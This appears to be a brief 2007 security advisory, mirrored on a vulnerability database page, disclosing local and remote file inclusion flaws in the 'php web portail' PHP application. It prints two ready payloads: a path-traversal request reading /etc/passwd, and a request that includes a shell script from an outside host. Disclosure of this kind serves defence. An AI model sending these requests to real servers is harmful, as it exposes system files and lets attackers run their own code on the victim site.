Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15950
HistoryFeb 02, 2007 - 12:00 a.m.

php web portail [remote file include & local file include]

2007-02-0200:00:00
vulners.com
24

php web portail [remote file include & local file include]
download site: https://sourceforge.net/project/showfiles.php?group_id=178400
product:php web portail
bug: remote file include & local file include
risk : high

local file include :
/index.php?page=…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd

remote file include :

/includes/includes.php?site_path=http://site.com/shell.txt?%00

laurent gaffie
http://s-a-p.ca/
contact: [email protected]